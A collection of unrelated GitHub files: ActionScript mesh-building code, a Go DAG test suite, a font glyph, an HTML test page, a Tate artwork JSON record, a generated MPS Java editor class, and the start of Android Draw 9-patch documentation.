var startRadians:Number = (startAngle / radiansPerDivision);
startRadians = startRadians < 0 ? -Math.ceil(-startRadians) : int(startRadians);
startRadians *= radiansPerDivision;
for ( var i:int = 0; i <= numSides+1; i++ )
{
var radians:Number = startRadians + i*radiansPerDivision;
var nextRadians:Number = radians + radiansPerDivision;
if ( nextRadians < startAngle ) continue;
var x:Number = Math.sin( radians ) * radius;
var y:Number = -Math.cos( radians ) * radius;
var prevRadians:Number = radians-radiansPerDivision;
var t:Number
if ( radians < startAngle && nextRadians > startAngle )
{
var nextX:Number = Math.sin(nextRadians) * radius;
var nextY:Number = -Math.cos(nextRadians) * radius;
t = (startAngle-radians) / radiansPerDivision;
x += t * (nextX-x);
y += t * (nextY-y);
}
else if ( radians > endAngle && prevRadians < endAngle )
{
var prevX:Number = Math.sin(prevRadians) * radius;
var prevY:Number = -Math.cos(prevRadians) * radius;
t = (endAngle-prevRadians) / radiansPerDivision;
x = prevX + t * (x-prevX);
y = prevY + t * (y-prevY);
}
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
numVertices++;
if ( vertices.length > 2*9 )
{
indices.push( 0, numVertices-2, numVertices-1 );
}
if ( radians >= endAngle )
{
break;
}
}
}
private static function buildArc( innerRadius:Number, radius:Number, startAngle:Number, endAngle:Number, numSides:int, vertices:Vector.<Number>, indices:Vector.<uint>, uvMatrix:Matrix , color:uint):void
{
var nv:int = 0;
var radiansPerDivision:Number = (Math.PI * 2) / numSides;
var startRadians:Number = (startAngle / radiansPerDivision);
startRadians = startRadians < 0 ? -Math.ceil(-startRadians) : int(startRadians);
startRadians *= radiansPerDivision;
var r:Number = (color >> 16) / 255;
var g:Number = ((color & 0x00FF00) >> 8) / 255;
var b:Number = (color & 0x0000FF) / 255;
for ( var i:int = 0; i <= numSides+1; i++ )
{
var angle:Number = startRadians + i*radiansPerDivision;
var nextAngle:Number = angle + radiansPerDivision;
if ( nextAngle < startAngle ) continue;
var sin:Number = Math.sin(angle);
var cos:Number = Math.cos(angle);
var x:Number = sin * radius;
var y:Number = -cos * radius;
var x2:Number = sin * innerRadius;
var y2:Number = -cos * innerRadius;
var prevAngle:Number = angle-radiansPerDivision;
var t:Number
if ( angle < startAngle && nextAngle > startAngle )
{
sin = Math.sin(nextAngle);
cos = Math.cos(nextAngle);
var nextX:Number = sin * radius;
var nextY:Number = -cos * radius;
var nextX2:Number = sin * innerRadius;
var nextY2:Number = -cos * innerRadius;
t = (startAngle-angle) / radiansPerDivision;
x += t * (nextX-x);
y += t * (nextY-y);
x2 += t * (nextX2-x2);
y2 += t * (nextY2-y2);
}
else if ( angle > endAngle && prevAngle < endAngle )
{
sin = Math.sin(prevAngle);
cos = Math.cos(prevAngle);
var prevX:Number = sin * radius;
var prevY:Number = -cos * radius;
var prevX2:Number = sin * innerRadius;
var prevY2:Number = -cos * innerRadius;
t = (endAngle-prevAngle) / radiansPerDivision;
x = prevX + t * (x-prevX);
y = prevY + t * (y-prevY);
x2 = prevX2 + t * (x2-prevX2);
y2 = prevY2 + t * (y2-prevY2);
}
_uv.x = x;
_uv.y = y;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x, y, 0, r, g, b, 1, _uv.x, _uv.y );
nv++;
_uv.x = x2;
_uv.y = y2;
if ( uvMatrix )
_uv = uvMatrix.transformPoint(_uv);
vertices.push( x2, y2, 0, r, g, b, 1, _uv.x, _uv.y );
nv++;
if ( vertices.length > 3*9 )
{
//indices.push( nv-1, nv-2, nv-3, nv-3, nv-2, nv-4 );
indices.push( nv-3, nv-2, nv-1, nv-3, nv-4, nv-2 );
}
if ( angle >= endAngle )
{
break;
}
}
}
}
} | {
"pile_set_name": "Github"
} |
/*
Copyright 2017, 2018 Ankyra
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package state
import (
. "gopkg.in/check.v1"
)
func (s *suite) Test_GetDeploymentStateDAG_empty_env(c *C) {
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
dag, err := env.GetDeploymentStateDAG(BuildStage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 0)
}
func (s *suite) Test_GetDeploymentStateDAG_one_deployment(c *C) {
stage := DeployStage
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
depl1, err := env.GetOrCreateDeploymentState("depl1")
c.Assert(err, IsNil)
depl1.GetStageOrCreateNew(stage)
dag, err := env.GetDeploymentStateDAG(stage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 1)
c.Assert(dag[0].Node, DeepEquals, depl1)
c.Assert(dag[0].AndThen, HasLen, 0)
}
func (s *suite) Test_GetDeploymentStateDAG_two_deployments_one_provider(c *C) {
stage := DeployStage
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
depl1, err := env.GetOrCreateDeploymentState("depl1")
c.Assert(err, IsNil)
depl2, err := env.GetOrCreateDeploymentState("depl2")
c.Assert(err, IsNil)
st := depl1.GetStageOrCreateNew(stage)
st.Providers["whatever"] = "depl2"
depl2.GetStageOrCreateNew(stage)
dag, err := env.GetDeploymentStateDAG(stage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 1)
c.Assert(dag[0].Node, DeepEquals, depl2)
c.Assert(dag[0].AndThen, HasLen, 1)
c.Assert(dag[0].AndThen[0].Node, DeepEquals, depl1)
c.Assert(dag[0].AndThen[0].AndThen, HasLen, 0)
tsort, err := env.GetDeploymentStateTopologicalSort(stage)
c.Assert(err, IsNil)
c.Assert(tsort, HasLen, 2)
c.Assert(tsort[0], DeepEquals, depl2)
c.Assert(tsort[1], DeepEquals, depl1)
}
func (s *suite) Test_GetDeploymentStateDAG(c *C) {
// For deployment graph:
//
// A -> B, E
// B -> C, D
// C -> D
// D
// E
stage := DeployStage
prj, _ := NewProjectState("my-project")
env, err := prj.GetEnvironmentStateOrMakeNew("my-env")
c.Assert(err, IsNil)
deplA, err := env.GetOrCreateDeploymentState("deplA")
c.Assert(err, IsNil)
deplB, err := env.GetOrCreateDeploymentState("deplB")
c.Assert(err, IsNil)
deplC, err := env.GetOrCreateDeploymentState("deplC")
c.Assert(err, IsNil)
deplD, err := env.GetOrCreateDeploymentState("deplD")
c.Assert(err, IsNil)
deplE, err := env.GetOrCreateDeploymentState("deplE")
c.Assert(err, IsNil)
stA := deplA.GetStageOrCreateNew(stage)
stA.Providers["b"] = "deplB"
stA.Providers["e"] = "deplE"
stB := deplB.GetStageOrCreateNew(stage)
stB.Providers["c"] = "deplC"
stB.Providers["d"] = "deplD"
stC := deplC.GetStageOrCreateNew(stage)
stC.Providers["d"] = "deplD"
deplD.GetStageOrCreateNew(stage)
deplE.GetStageOrCreateNew(stage)
dag, err := env.GetDeploymentStateDAG(stage)
c.Assert(err, IsNil)
c.Assert(dag, HasLen, 2)
var bDag, cDag, dDag, eDag *DAGNode
if dag[0].Node.Name == "deplD" {
dDag = dag[0]
eDag = dag[1]
} else {
dDag = dag[1]
eDag = dag[0]
}
c.Assert(dDag.Node, DeepEquals, deplD)
c.Assert(dDag.AndThen, HasLen, 2)
if dDag.AndThen[0].Node.Name == "deplB" {
bDag = dDag.AndThen[0]
cDag = dDag.AndThen[1]
} else {
bDag = dDag.AndThen[1]
cDag = dDag.AndThen[0]
}
c.Assert(bDag.Node, DeepEquals, deplB)
c.Assert(bDag.AndThen, HasLen, 1)
c.Assert(bDag.AndThen[0].Node, DeepEquals, deplA)
c.Assert(cDag.Node, DeepEquals, deplC)
c.Assert(cDag.AndThen, HasLen, 1)
c.Assert(cDag.AndThen[0].Node, DeepEquals, deplB)
c.Assert(eDag.Node, DeepEquals, deplE)
c.Assert(eDag.AndThen, HasLen, 1)
c.Assert(eDag.AndThen[0].Node, DeepEquals, deplA)
i := 0
for i < 1000 {
tsort, err := env.GetDeploymentStateTopologicalSort(stage)
c.Assert(err, IsNil)
for ix, depl := range tsort {
st := depl.GetStageOrCreateNew(stage)
for _, deplName := range st.Providers {
found := false
for depIx, depDepl := range tsort {
if depDepl.Name == deplName {
found = true
c.Assert(depIx < ix, Equals, true, Commentf("Deployment '%s' should happen before '%s'", deplName, depl.Name))
}
}
c.Assert(found, Equals, true, Commentf("Missing deployment '%s' in topological sort", depl.Name))
}
}
i += 1
}
}
type hasItemChecker struct{}
var HasItem = &hasItemChecker{}
func (*hasItemChecker) Info() *CheckerInfo {
return &CheckerInfo{Name: "HasItem", Params: []string{"obtained", "expected to have item"}}
}
func (*hasItemChecker) Check(params []interface{}, names []string) (bool, string) {
obtained := params[0]
expectedItem := params[1]
switch obtained.(type) {
case []interface{}:
for _, v := range obtained.([]interface{}) {
if v == expectedItem {
return true, ""
}
}
case []string:
for _, v := range obtained.([]string) {
if v == expectedItem {
return true, ""
}
}
default:
return false, "Unexpected type."
}
return false, "Item not found"
}
| {
"pile_set_name": "Github"
} |
StartChar: delta.sc
Encoding: 1114211 -1 892
Width: 434
Flags: MW
LayerCount: 2
Fore
SplineSet
116 2 m 2
96 2 63 -3 40 -3 c 0
26 -3 17 9 17 17 c 0
17 26 32 49 50 92 c 2
166 360 l 2
180 393 175 407 178 410 c 0
187 419 211 444 217 451 c 0
225 460 230 463 233 463 c 0
237 463 238 460 240 454 c 2
375 107 l 2
386 79 410 30 410 17 c 0
410 10 395 -3 381 -3 c 0
359 -3 325 2 290 2 c 2
116 2 l 2
311 58 m 2
207 337 l 2
201 352 199 352 193 337 c 2
83 65 l 2
76 48 86 48 86 48 c 1
294 48 l 1
294 48 315 47 311 58 c 2
EndSplineSet
Validated: 1
EndChar
| {
"pile_set_name": "Github"
} |
<html>
<head>
<title>Test</title>
<script src="example_output.js"></script>
<script>
init = function() {
var person = Person.createFrom({
"name": "Ovo Ono",
"nicknames": ["aaa", "bbb"],
"personal_info": {
"hobby": ["1", "2"],
"pet_name": "nera"
},
"addresses": [
{ "city": "aaa", "number": 13 },
{ "city": "bbb", "number": 14 }
]});
if (person.getInfo() != "name:Ovo Ono") {
alert("Person method not there");
return;
}
if (person.personal_info.hobby.length != 2) {
alert("No hobbies found");
return;
}
if (person.addresses.length != 2) {
alert("No addresses found");
return;
}
if (person.addresses[1].getAddressString() != "bbb 14") {
alert("Address methodincorrect");
return;
}
alert("OK");
Person.createFrom({
"name": "Ovo Ono",
"nicknames": ["aaa", "bbb"],
"personal_info": {
"hobby": ["1", "2"],
"pet_name": "nera"
}});
alert("OK");
var person = Person.createFrom({
"name": "Ovo Ono",
"nicknames": ["aaa", "bbb"],
"personal_info": {}
});
alert("OK");
var person = Person.createFrom({
});
alert("OK");
};
</script>
</head>
<body onload="init()">
<h1>Test</h1>
<h2>OK (check browser console for errors)?<h2>
</body>
</html>
| {
"pile_set_name": "Github"
} |
{
"acno": "D03930",
"acquisitionYear": 1856,
"all_artists": "Joseph Mallord William Turner",
"catalogueGroup": {
"accessionRanges": "D03833-D03973; D40780",
"completeStatus": "COMPLETE",
"finbergNumber": "LXVI",
"groupType": "Turner Sketchbook",
"id": 65716,
"shortTitle": "Egyptian Details Sketchbook"
},
"classification": "on paper, unique",
"contributorCount": 1,
"contributors": [
{
"birthYear": 1775,
"date": "1775\u20131851",
"displayOrder": 1,
"fc": "Joseph Mallord William Turner",
"gender": "Male",
"id": 558,
"mda": "Turner, Joseph Mallord William",
"role": "artist",
"startLetter": "T"
}
],
"creditLine": "Accepted by the nation as part of the Turner Bequest 1856",
"dateRange": {
"endYear": 1800,
"startYear": 1799,
"text": "c.1799-1800"
},
"dateText": "c.1799\u20131800",
"depth": "",
"dimensions": "support: 166 x 82 mm",
"finberg": "LXVI 94",
"foreignTitle": null,
"groupTitle": "Egyptian Details Sketchbook",
"height": "82",
"id": 31325,
"inscription": null,
"medium": null,
"movementCount": 0,
"pageNumber": 191,
"subjectCount": 0,
"thumbnailCopyright": null,
"thumbnailUrl": null,
"title": "[blank]",
"units": "mm",
"url": "http://www.tate.org.uk/art/artworks/turner-blank-d03930",
"width": "166"
} | {
"pile_set_name": "Github"
} |
package jetbrains.mps.lang.plugin.standalone.editor;
/*Generated by MPS */
import jetbrains.mps.editor.runtime.descriptor.AbstractEditorBuilder;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.mps.openapi.model.SNode;
import jetbrains.mps.openapi.editor.EditorContext;
import jetbrains.mps.openapi.editor.cells.EditorCell;
import jetbrains.mps.nodeEditor.cells.EditorCell_Collection;
import jetbrains.mps.nodeEditor.cellLayout.CellLayout_Vertical;
import jetbrains.mps.openapi.editor.style.Style;
import jetbrains.mps.editor.runtime.style.StyleImpl;
import jetbrains.mps.editor.runtime.style.StyleAttributes;
import jetbrains.mps.nodeEditor.BlockCells;
import jetbrains.mps.nodeEditor.cellLayout.CellLayout_Horizontal;
import jetbrains.mps.nodeEditor.cells.EditorCell_Constant;
import org.jetbrains.mps.openapi.language.SProperty;
import jetbrains.mps.openapi.editor.menus.transformation.SPropertyInfo;
import jetbrains.mps.nodeEditor.cells.EditorCell_Property;
import jetbrains.mps.nodeEditor.cells.SPropertyAccessor;
import jetbrains.mps.nodeEditor.cellMenu.SPropertySubstituteInfo;
import jetbrains.mps.lang.smodel.generator.smodelAdapter.SNodeOperations;
import jetbrains.mps.lang.smodel.generator.smodelAdapter.IAttributeDescriptor;
import jetbrains.mps.internal.collections.runtime.Sequence;
import jetbrains.mps.internal.collections.runtime.IWhereFilter;
import java.util.Objects;
import jetbrains.mps.lang.core.behavior.PropertyAttribute__BehaviorDescriptor;
import jetbrains.mps.nodeEditor.EditorManager;
import jetbrains.mps.openapi.editor.update.AttributeKind;
import jetbrains.mps.nodeEditor.MPSFonts;
import jetbrains.mps.nodeEditor.cells.EditorCell_Indent;
import jetbrains.mps.nodeEditor.cellProviders.AbstractCellListHandler;
import jetbrains.mps.lang.editor.cellProviders.RefNodeListHandler;
import org.jetbrains.mps.openapi.language.SContainmentLink;
import org.jetbrains.mps.openapi.language.SAbstractConcept;
import jetbrains.mps.openapi.editor.menus.transformation.SNodeLocation;
import jetbrains.mps.openapi.editor.cells.DefaultSubstituteInfo;
import jetbrains.mps.nodeEditor.cellMenu.SEmptyContainmentSubstituteInfo;
import jetbrains.mps.nodeEditor.cellMenu.SChildSubstituteInfo;
import jetbrains.mps.openapi.editor.cells.CellActionType;
import jetbrains.mps.nodeEditor.cellActions.CellAction_DeleteNode;
import jetbrains.mps.lang.editor.cellProviders.SingleRoleCellProvider;
import jetbrains.mps.editor.runtime.impl.cellActions.CellAction_DeleteSmart;
import jetbrains.mps.smodel.adapter.structure.MetaAdapterFactory;
import org.jetbrains.mps.openapi.language.SConcept;
/*package*/ class ApplicationPluginDeclaration_EditorBuilder_a extends AbstractEditorBuilder {
@NotNull
private SNode myNode;
public ApplicationPluginDeclaration_EditorBuilder_a(@NotNull EditorContext context, @NotNull SNode node) {
super(context);
myNode = node;
}
@NotNull
@Override
public SNode getNode() {
return myNode;
}
/*package*/ EditorCell createCell() {
return createCollection_0();
}
private EditorCell createCollection_0() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Vertical());
editorCell.setCellId("Collection_n7kiqy_a");
editorCell.setBig(true);
setCellContext(editorCell);
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createCollection_1());
editorCell.addEditorCell(createCollection_3());
if (nodeCondition_n7kiqy_a2a()) {
editorCell.addEditorCell(createConstant_4());
}
return editorCell;
}
private boolean nodeCondition_n7kiqy_a2a() {
return BlockCells.useBraces();
}
private EditorCell createCollection_1() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Horizontal());
editorCell.setCellId("Collection_n7kiqy_a0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createCollection_2());
if (nodeCondition_n7kiqy_a1a0()) {
editorCell.addEditorCell(createConstant_1());
}
return editorCell;
}
private boolean nodeCondition_n7kiqy_a1a0() {
return BlockCells.useBraces();
}
private EditorCell createCollection_2() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Horizontal());
editorCell.setCellId("Collection_n7kiqy_a0a");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createConstant_0());
editorCell.addEditorCell(createProperty_0());
return editorCell;
}
private EditorCell createConstant_0() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "application plugin");
editorCell.setCellId("Constant_n7kiqy_a0a0");
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createProperty_0() {
getCellFactory().pushCellContext();
try {
final SProperty property = PROPS.name$MnvL;
getCellFactory().setPropertyInfo(new SPropertyInfo(myNode, property));
EditorCell_Property editorCell = EditorCell_Property.create(getEditorContext(), new SPropertyAccessor(myNode, property, false, false), myNode);
editorCell.setDefaultText("<name>");
editorCell.setCellId("property_name");
editorCell.setSubstituteInfo(new SPropertySubstituteInfo(editorCell, property));
setCellContext(editorCell);
Iterable<SNode> propertyAttributes = SNodeOperations.ofConcept(new IAttributeDescriptor.AllAttributes().list(myNode), CONCEPTS.PropertyAttribute$Gb);
Iterable<SNode> currentPropertyAttributes = Sequence.fromIterable(propertyAttributes).where(new IWhereFilter<SNode>() {
public boolean accept(SNode it) {
return Objects.equals(PropertyAttribute__BehaviorDescriptor.getProperty_id1avfQ4BBzOo.invoke(it), property);
}
});
if (Sequence.fromIterable(currentPropertyAttributes).isNotEmpty()) {
EditorManager manager = EditorManager.getInstanceFromContext(getEditorContext());
return manager.createNodeRoleAttributeCell(Sequence.fromIterable(currentPropertyAttributes).first(), AttributeKind.PROPERTY, editorCell);
} else
return editorCell;
} finally {
getCellFactory().popCellContext();
}
}
private EditorCell createConstant_1() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "{");
editorCell.setCellId("Constant_n7kiqy_b0a");
Style style = new StyleImpl();
style.set(StyleAttributes.MATCHING_LABEL, "brace");
style.set(StyleAttributes.INDENT_LAYOUT_NO_WRAP, true);
style.set(StyleAttributes.FONT_STYLE, MPSFonts.PLAIN);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createCollection_3() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Horizontal());
editorCell.setCellId("Collection_n7kiqy_b0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.addEditorCell(createIndentCell_0());
editorCell.addEditorCell(createCollection_4());
return editorCell;
}
private EditorCell createIndentCell_0() {
EditorCell_Indent editorCell = new EditorCell_Indent(getEditorContext(), myNode);
return editorCell;
}
private EditorCell createCollection_4() {
EditorCell_Collection editorCell = new EditorCell_Collection(getEditorContext(), myNode, new CellLayout_Vertical());
editorCell.setCellId("Collection_n7kiqy_b1a");
editorCell.addEditorCell(createRefNodeList_0());
editorCell.addEditorCell(createConstant_2());
editorCell.addEditorCell(createRefNode_0());
editorCell.addEditorCell(createConstant_3());
editorCell.addEditorCell(createRefNode_1());
return editorCell;
}
private EditorCell createRefNodeList_0() {
AbstractCellListHandler handler = new fieldDeclarationListHandler_n7kiqy_a1b0(myNode, getEditorContext());
EditorCell_Collection editorCell = handler.createCells(new CellLayout_Vertical(), false);
editorCell.setCellId("refNodeList_fieldDeclaration");
editorCell.setSRole(handler.getElementSRole());
return editorCell;
}
private static class fieldDeclarationListHandler_n7kiqy_a1b0 extends RefNodeListHandler {
@NotNull
private SNode myNode;
public fieldDeclarationListHandler_n7kiqy_a1b0(SNode ownerNode, EditorContext context) {
super(context, false);
myNode = ownerNode;
}
@NotNull
public SNode getNode() {
return myNode;
}
public SContainmentLink getSLink() {
return LINKS.fieldDeclaration$HYka;
}
public SAbstractConcept getChildSConcept() {
return CONCEPTS.DefaultClassifierFieldDeclaration$Hv;
}
public EditorCell createNodeCell(SNode elementNode) {
EditorCell elementCell = getUpdateSession().updateChildNodeCell(elementNode);
installElementCellActions(elementNode, elementCell, false);
return elementCell;
}
public EditorCell createEmptyCell() {
getCellFactory().pushCellContext();
getCellFactory().setNodeLocation(new SNodeLocation.FromParentAndLink(fieldDeclarationListHandler_n7kiqy_a1b0.this.getNode(), LINKS.fieldDeclaration$HYka));
try {
EditorCell emptyCell = null;
emptyCell = super.createEmptyCell();
installElementCellActions(null, emptyCell, true);
setCellContext(emptyCell);
return emptyCell;
} finally {
getCellFactory().popCellContext();
}
}
private static final Object OBJ = new Object();
public void installElementCellActions(SNode elementNode, EditorCell elementCell, boolean isEmptyCell) {
if (elementCell.getUserObject(AbstractCellListHandler.ELEMENT_CELL_COMPLETE_SET) == null) {
if (elementCell.getSubstituteInfo() == null || elementCell.getSubstituteInfo() instanceof DefaultSubstituteInfo) {
elementCell.putUserObject(AbstractCellListHandler.ELEMENT_CELL_COMPLETE_SET, OBJ);
elementCell.setSubstituteInfo((isEmptyCell ? new SEmptyContainmentSubstituteInfo(elementCell) : new SChildSubstituteInfo(elementCell)));
}
}
if (elementCell.getUserObject(AbstractCellListHandler.ELEMENT_CELL_DELETE_SET) == null) {
if (elementNode != null) {
elementCell.putUserObject(AbstractCellListHandler.ELEMENT_CELL_DELETE_SET, OBJ);
elementCell.setAction(CellActionType.DELETE, new CellAction_DeleteNode(elementNode, CellAction_DeleteNode.DeleteDirection.FORWARD));
}
}
if (elementCell.getUserObject(ELEMENT_CELL_BACKSPACE_SET) == null) {
if (elementNode != null) {
elementCell.putUserObject(ELEMENT_CELL_BACKSPACE_SET, OBJ);
elementCell.setAction(CellActionType.BACKSPACE, new CellAction_DeleteNode(elementNode, CellAction_DeleteNode.DeleteDirection.BACKWARD));
}
}
if (elementCell.getUserObject(AbstractCellListHandler.ELEMENT_CELL_ACTIONS_SET) == null) {
if (elementNode != null) {
elementCell.putUserObject(AbstractCellListHandler.ELEMENT_CELL_ACTIONS_SET, OBJ);
}
}
}
}
private EditorCell createConstant_2() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "");
editorCell.setCellId("Constant_n7kiqy_b1b0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createRefNode_0() {
SingleRoleCellProvider provider = new initBlockSingleRoleHandler_n7kiqy_c1b0(myNode, LINKS.initBlock$HXQ8, getEditorContext());
return provider.createCell();
}
private static class initBlockSingleRoleHandler_n7kiqy_c1b0 extends SingleRoleCellProvider {
@NotNull
private SNode myNode;
public initBlockSingleRoleHandler_n7kiqy_c1b0(SNode ownerNode, SContainmentLink containmentLink, EditorContext context) {
super(containmentLink, context);
myNode = ownerNode;
}
@Override
@NotNull
public SNode getNode() {
return myNode;
}
protected EditorCell createChildCell(SNode child) {
EditorCell editorCell = getUpdateSession().updateChildNodeCell(child);
editorCell.setAction(CellActionType.DELETE, new CellAction_DeleteSmart(getNode(), LINKS.initBlock$HXQ8, child));
editorCell.setAction(CellActionType.BACKSPACE, new CellAction_DeleteSmart(getNode(), LINKS.initBlock$HXQ8, child));
installCellInfo(child, editorCell, false);
return editorCell;
}
private void installCellInfo(SNode child, EditorCell editorCell, boolean isEmpty) {
if (editorCell.getSubstituteInfo() == null || editorCell.getSubstituteInfo() instanceof DefaultSubstituteInfo) {
editorCell.setSubstituteInfo((isEmpty ? new SEmptyContainmentSubstituteInfo(editorCell) : new SChildSubstituteInfo(editorCell)));
}
if (editorCell.getSRole() == null) {
editorCell.setSRole(LINKS.initBlock$HXQ8);
}
}
@Override
protected EditorCell createEmptyCell() {
getCellFactory().pushCellContext();
getCellFactory().setNodeLocation(new SNodeLocation.FromParentAndLink(getNode(), LINKS.initBlock$HXQ8));
try {
EditorCell editorCell = super.createEmptyCell();
editorCell.setCellId("empty_initBlock");
installCellInfo(null, editorCell, true);
setCellContext(editorCell);
return editorCell;
} finally {
getCellFactory().popCellContext();
}
}
protected String getNoTargetText() {
return "<init block>";
}
}
private EditorCell createConstant_3() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "");
editorCell.setCellId("Constant_n7kiqy_d1b0");
Style style = new StyleImpl();
style.set(StyleAttributes.SELECTABLE, false);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private EditorCell createRefNode_1() {
SingleRoleCellProvider provider = new disposeBlockSingleRoleHandler_n7kiqy_e1b0(myNode, LINKS.disposeBlock$HY59, getEditorContext());
return provider.createCell();
}
private static class disposeBlockSingleRoleHandler_n7kiqy_e1b0 extends SingleRoleCellProvider {
@NotNull
private SNode myNode;
public disposeBlockSingleRoleHandler_n7kiqy_e1b0(SNode ownerNode, SContainmentLink containmentLink, EditorContext context) {
super(containmentLink, context);
myNode = ownerNode;
}
@Override
@NotNull
public SNode getNode() {
return myNode;
}
protected EditorCell createChildCell(SNode child) {
EditorCell editorCell = getUpdateSession().updateChildNodeCell(child);
editorCell.setAction(CellActionType.DELETE, new CellAction_DeleteSmart(getNode(), LINKS.disposeBlock$HY59, child));
editorCell.setAction(CellActionType.BACKSPACE, new CellAction_DeleteSmart(getNode(), LINKS.disposeBlock$HY59, child));
installCellInfo(child, editorCell, false);
return editorCell;
}
private void installCellInfo(SNode child, EditorCell editorCell, boolean isEmpty) {
if (editorCell.getSubstituteInfo() == null || editorCell.getSubstituteInfo() instanceof DefaultSubstituteInfo) {
editorCell.setSubstituteInfo((isEmpty ? new SEmptyContainmentSubstituteInfo(editorCell) : new SChildSubstituteInfo(editorCell)));
}
if (editorCell.getSRole() == null) {
editorCell.setSRole(LINKS.disposeBlock$HY59);
}
}
@Override
protected EditorCell createEmptyCell() {
getCellFactory().pushCellContext();
getCellFactory().setNodeLocation(new SNodeLocation.FromParentAndLink(getNode(), LINKS.disposeBlock$HY59));
try {
EditorCell editorCell = super.createEmptyCell();
editorCell.setCellId("empty_disposeBlock");
installCellInfo(null, editorCell, true);
setCellContext(editorCell);
return editorCell;
} finally {
getCellFactory().popCellContext();
}
}
protected String getNoTargetText() {
return "<dispose block>";
}
}
private EditorCell createConstant_4() {
EditorCell_Constant editorCell = new EditorCell_Constant(getEditorContext(), myNode, "}");
editorCell.setCellId("Constant_n7kiqy_c0");
Style style = new StyleImpl();
style.set(StyleAttributes.MATCHING_LABEL, "brace");
style.set(StyleAttributes.INDENT_LAYOUT_NO_WRAP, true);
style.set(StyleAttributes.FONT_STYLE, MPSFonts.PLAIN);
editorCell.getStyle().putAll(style);
editorCell.setDefaultText("");
return editorCell;
}
private static final class PROPS {
/*package*/ static final SProperty name$MnvL = MetaAdapterFactory.getProperty(0xceab519525ea4f22L, 0x9b92103b95ca8c0cL, 0x110396eaaa4L, 0x110396ec041L, "name");
}
private static final class CONCEPTS {
/*package*/ static final SConcept PropertyAttribute$Gb = MetaAdapterFactory.getConcept(0xceab519525ea4f22L, 0x9b92103b95ca8c0cL, 0x2eb1ad060897da56L, "jetbrains.mps.lang.core.structure.PropertyAttribute");
/*package*/ static final SConcept DefaultClassifierFieldDeclaration$Hv = MetaAdapterFactory.getConcept(0x443f4c36fcf54eb6L, 0x95008d06ed259e3eL, 0x11aa7fc0293L, "jetbrains.mps.baseLanguage.classifiers.structure.DefaultClassifierFieldDeclaration");
}
private static final class LINKS {
/*package*/ static final SContainmentLink fieldDeclaration$HYka = MetaAdapterFactory.getContainmentLink(0xef7bf5acd06c4342L, 0xb11de42104eb9343L, 0x6b059b0986f2058L, 0x6b059b0986f205cL, "fieldDeclaration");
/*package*/ static final SContainmentLink initBlock$HXQ8 = MetaAdapterFactory.getContainmentLink(0xef7bf5acd06c4342L, 0xb11de42104eb9343L, 0x6b059b0986f2058L, 0x6b059b0986f205aL, "initBlock");
/*package*/ static final SContainmentLink disposeBlock$HY59 = MetaAdapterFactory.getContainmentLink(0xef7bf5acd06c4342L, 0xb11de42104eb9343L, 0x6b059b0986f2058L, 0x6b059b0986f205bL, "disposeBlock");
}
}
| {
"pile_set_name": "Github"
} |
page.title=Draw 9-patch
page.tags="NinePatch"
@jd:body
<p>The Draw 9-patch tool allows you to easily create a
{@link android.graphics.NinePatch} graphic using a WYSIWYG editor.</p>
<p>For an introduction to Nine-patch graphics and how they work, please read
the section about Nine-patch in the
<a href="{@docRoot}guide/topics/graphics/2d-graphics.html#nine-patch">2D Graphics</a>
document.</p>
<img src="{@docRoot}images/draw9patch-norm.png" style="float:right" alt="" height="300" width="341"
/>
<p>Here's a quick guide to create a Nine-patch graphic using the Draw 9-patch tool.
You'll need the PNG image with which you'd like to create a NinePatch.</p>
<ol>
<li>From a terminal, launch the <code>draw9patch</code> application from your SDK
<code>/tools</code> directory.
</li>
<li>Drag your PNG image into the Draw 9-patch window
(or <strong>File</strong> > <strong>Open 9-patch...</strong> to locate the file).
Your workspace will now open.
<p>The left pane is your drawing area, in which you can edit the lines for the
stretchable patches and content area. The right
pane is the preview area, where you can preview your graphic when stretched.</p>
</li>
<li>Click within the 1-pixel perimeter to draw the lines that define the stretchable
